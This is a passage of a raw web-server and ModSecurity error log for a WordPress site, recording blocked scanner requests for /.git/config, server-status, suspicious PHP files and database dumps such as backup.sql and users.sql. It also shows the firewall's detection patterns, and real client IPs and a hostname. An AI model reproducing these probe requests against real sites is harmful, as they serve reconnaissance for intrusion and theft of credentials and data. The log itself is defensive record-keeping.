"OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOY_X_2dK7CQcJs05hiZlQAAAJY"], referer: www.google.com [Wed Aug 23 14:41:45.974715 2023] [autoindex:error] [pid 25840:tid 140233702045440] [client 51.68.11.215:43844] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Wed Aug 23 18:22:48.199807 2023] [:error] [pid 25839:tid 140233819543296] [client 179.43.191.18:52798] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Aug 23 18:22:49.039043 2023] [:error] [pid 25839:tid 140233777579776] [client 179.43.191.18:52802] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Aug 23 18:49:09.011116 2023] [autoindex:error] [pid 25841:tid 140233760794368] [client 91.134.248.235:53874] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/plupload/index.php [Wed Aug 23 19:34:34.856042 2023] [autoindex:error] [pid 25840:tid 140233811150592] [client 141.94.87.67:55412] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Thu Aug 24 02:48:44.803621 2023] [authz_core:error] [pid 26057:tid 140233794365184] [client 138.68.163.10:48560] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/24 02:48:49 [error] 25797#25797: *1386537 access forbidden by rule, client: 138.68.163.10, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 24 04:38:22.511827 2023] [authz_core:error] [pid 30267:tid 140378783532800] [client 159.89.83.196:51926] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/24 04:38:24 [error] 30026#30026: *1389088 access forbidden by rule, client: 159.89.83.196, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 24 06:10:18.100214 2023] [authz_core:error] [pid 30267:tid 140378632079104] [client 167.71.48.191:55322] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/24 06:10:23 [error] 30027#30027: *1391686 access forbidden by rule, client: 167.71.48.191, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 24 06:51:01.352015 2023] [authz_core:error] [pid 30267:tid 140378648864512] [client 167.172.20.95:56704] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/24 06:51:04 [error] 30027#30027: *1392698 access forbidden by rule, client: 167.172.20.95, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 24 07:07:37.422164 2023] [autoindex:error] [pid 30069:tid 140378556544768] [client 34.176.89.193:57426] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Aug 24 14:38:26.303322 2023] [autoindex:error] [pid 1525:tid 139995213960960] [client 52.176.98.162:47710] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Aug 24 20:33:20.631881 2023] [autoindex:error] [pid 1524:tid 139995197175552] [client 51.178.146.199:34734] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/crop/index.php [Fri Aug 25 03:00:53.549796 2023] [authz_core:error] [pid 1524:tid 139995264317184] [client 146.190.64.200:49554] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/25 03:00:55 [error] 1730#1730: *30160 access forbidden by rule, client: 146.190.64.200, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Aug 25 04:04:14.243291 2023] [authz_core:error] [pid 23323:tid 139751013132032] [client 138.68.133.118:51944] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/25 04:04:19 [error] 22951#22951: *31877 access forbidden by rule, client: 138.68.133.118, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Aug 25 05:33:08.286777 2023] [authz_core:error] [pid 23121:tid 139751004739328] [client 165.232.76.155:54686] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/25 05:33:12 [error] 22951#22951: *34059 access forbidden by rule, client: 165.232.76.155, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Aug 25 07:34:39.353525 2023] [authz_core:error] [pid 23121:tid 139751055095552] [client 162.243.186.177:58666] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/25 07:34:41 [error] 22950#22950: *37170 access forbidden by rule, client: 162.243.186.177, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Aug 26 08:16:34.525470 2023] [authz_core:error] [pid 27301:tid 140220146120448] [client 161.35.27.144:37494] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/26 08:16:44 [error] 21738#21738: *97933 access forbidden by rule, client: 161.35.27.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Aug 26 08:30:58.867265 2023] [authz_core:error] [pid 17179:tid 140220223874816] [client 137.184.106.30:39532] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/26 08:31:01 [error] 21738#21738: *99824 access forbidden by rule, client: 137.184.106.30, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Aug 26 12:35:54.574652 2023] [autoindex:error] [pid 27301:tid 140220223874816] [client 104.200.17.112:45460] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Aug 26 12:36:00.927426 2023] [autoindex:error] [pid 21908:tid 140220020229888] [client 162.55.92.235:45486] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Aug 26 12:36:04.427975 2023] [autoindex:error] [pid 27301:tid 140220129335040] [client 104.200.17.112:45502] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php [Sat Aug 26 12:36:19.710732 2023] [autoindex:error] [pid 21908:tid 140220249052928] [client 162.55.92.235:45562] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php [Sat Aug 26 14:15:43.443148 2023] [authz_core:error] [pid 27301:tid 140220146120448] [client 192.53.126.23:60378] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/26 14:15:55 [error] 21739#21739: *144614 access forbidden by rule, client: 192.53.126.23, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Aug 26 14:53:33.182969 2023] [autoindex:error] [pid 27301:tid 140220087371520] [client 66.70.145.42:36384] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2023/08/26 20:53:46 [error] 21738#21738: *187416 access forbidden by rule, client: 54.159.29.110, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/26 21:34:28 [error] 21739#21739: *192428 access forbidden by rule, client: 54.159.29.110, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/08/26 22:42:32 [error] 21739#21739: *200379 access forbidden by rule, client: 54.159.29.110, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Aug 27 02:29:31.733475 2023] [:error] [pid 27301:tid 140220249052928] [client 179.43.191.18:58740] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Aug 27 02:29:32.011132 2023] [:error] [pid 17179:tid 140220240660224] [client 179.43.191.18:58742] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Aug 27 07:02:47.009163 2023] [autoindex:error] [pid 20244:tid 140168707127040] [client 20.244.2.231:37820] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Aug 27 13:45:19.788792 2023] [autoindex:error] [pid 9553:tid 140168648378112] [client 85.25.177.53:42366] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Aug 27 13:45:30.527191 2023] [autoindex:error] [pid 9553:tid 140168681948928] [client 85.25.177.53:42402] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php [Sun Aug 27 14:37:58.930798 2023] [authz_core:error] [pid 9553:tid 140168723912448] [client 192.53.126.23:52770] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/27 14:38:04 [error] 20120#20120: *316043 access forbidden by rule, client: 192.53.126.23, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Aug 27 15:24:57.210485 2023] [authz_core:error] [pid 9553:tid 140168732305152] [client 139.144.96.150:59058] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/27 15:25:02 [error] 20119#20119: *322002 access forbidden by rule, client: 139.144.96.150, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Aug 27 16:12:47.680287 2023] [authz_core:error] [pid 9553:tid 140168749090560] [client 45.55.193.222:37692] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/27 16:12:51 [error] 20120#20120: *328440 access forbidden by rule, client: 45.55.193.222, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Aug 27 16:39:30.938100 2023] [authz_core:error] [pid 20150:tid 140168799446784] [client 104.236.193.132:41594] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/27 16:39:34 [error] 20120#20120: *332052 access forbidden by rule, client: 104.236.193.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/27 18:39:41 [error] 20120#20120: *347919 access forbidden by rule, client: 52.15.241.221, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Aug 27 19:07:13.872923 2023] [autoindex:error] [pid 9553:tid 140168791054080] [client 23.99.212.155:35276] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/08/27 21:25:01 [error] 20120#20120: *371246 access forbidden by rule, client: 54.67.77.37, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/27 21:51:01 [error] 20119#20119: *374697 access forbidden by rule, client: 54.67.77.37, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 28 03:51:03.938778 2023] [autoindex:error] [pid 5217:tid 140470185322240] [client 20.219.36.135:55622] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Aug 28 04:12:32.971387 2023] [:error] [pid 5217:tid 140470143358720] [client 20.27.76.161:58502] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Aug 28 04:12:41.328129 2023] [:error] [pid 5313:tid 140470143358720] [client 20.27.76.161:58514] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Aug 28 07:39:26.192866 2023] [:error] [pid 10146:tid 140470185322240] [client 5.23.48.147:57062] [client 5.23.48.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "ZOyVfmxG43-5C5Xwa3m1swAAAQ0"] [Mon Aug 28 15:33:55.431213 2023] [authz_core:error] [pid 10146:tid 140470151751424] [client 139.144.96.150:40986] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/28 15:34:07 [error] 5189#5189: *513105 access forbidden by rule, client: 139.144.96.150, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 28 15:53:11.900657 2023] [authz_core:error] [pid 5219:tid 140470118180608] [client 142.93.158.96:44112] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/28 15:53:15 [error] 5190#5190: *515855 access forbidden by rule, client: 142.93.158.96, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Aug 28 17:19:36.403879 2023] [authz_core:error] [pid 10146:tid 140470193714944] [client 139.144.150.26:57402] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/28 17:19:41 [error] 5190#5190: *527997 access forbidden by rule, client: 139.144.150.26, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 28 17:36:07.615542 2023] [authz_core:error] [pid 10146:tid 140470168536832] [client 104.131.1.32:59912] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/28 17:36:11 [error] 5190#5190: *530332 access forbidden by rule, client: 104.131.1.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Aug 29 04:46:50.356132 2023] [autoindex:error] [pid 18302:tid 140198152976128] [client 23.99.213.115:43948] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Aug 29 13:20:15.640587 2023] [:error] [pid 3721:tid 140197924628224] [client 20.27.76.161:34170] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Aug 29 13:20:22.350195 2023] [:error] [pid 3810:tid 140197958199040] [client 20.27.76.161:34182] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Aug 29 16:16:16.697841 2023] [:error] [pid 3721:tid 140197882664704] [client 18.222.183.82:59148] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/temp.sql"] [unique_id "ZO5gIKRcMO_AOUye90he6QAAABg"] [Tue Aug 29 16:16:16.714829 2023] [:error] [pid 7621:tid 140197958199040] [client 18.222.183.82:59150] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZO5gIMp1z_7TE3T2nEPVrgAAAQ8"] [Tue Aug 29 16:16:16.715552 2023] [:error] [pid 7621:tid 140197958199040] [client 18.222.183.82:59152] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/data.sql"] [unique_id "ZO5gIMp1z_7TE3T2nEPVrwAAAQ8"] [Tue Aug 29 16:16:16.716240 2023] [:error] [pid 7621:tid 140197958199040] [client 18.222.183.82:59154] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/mysqldump.sql"] [unique_id "ZO5gIMp1z_7TE3T2nEPVsAAAAQ8"] [Tue Aug 29 16:16:16.716559 2023] [:error] [pid 7621:tid 140197916235520] [client 18.222.183.82:59156] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/database.sql"] [unique_id "ZO5gIMp1z_7TE3T2nEPVsQAAARQ"] [Tue Aug 29 16:16:16.716869 2023] [:error] [pid 7621:tid 140197958199040] [client 18.222.183.82:59158] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/db_backup.sql"] [unique_id "ZO5gIMp1z_7TE3T2nEPVsgAAAQ8"] [Tue Aug 29 16:16:16.717567 2023] [:error] [pid 3721:tid 140197933020928] [client 18.222.183.82:59160] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/users.sql"] [unique_id "ZO5gIKRcMO_AOUye90he6gAAABI"] [Tue Aug 29 16:16:16.718184 2023] [:error] [pid 3721:tid 140197933020928] [client 18.222.183.82:59162] [client 18.222.183.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev 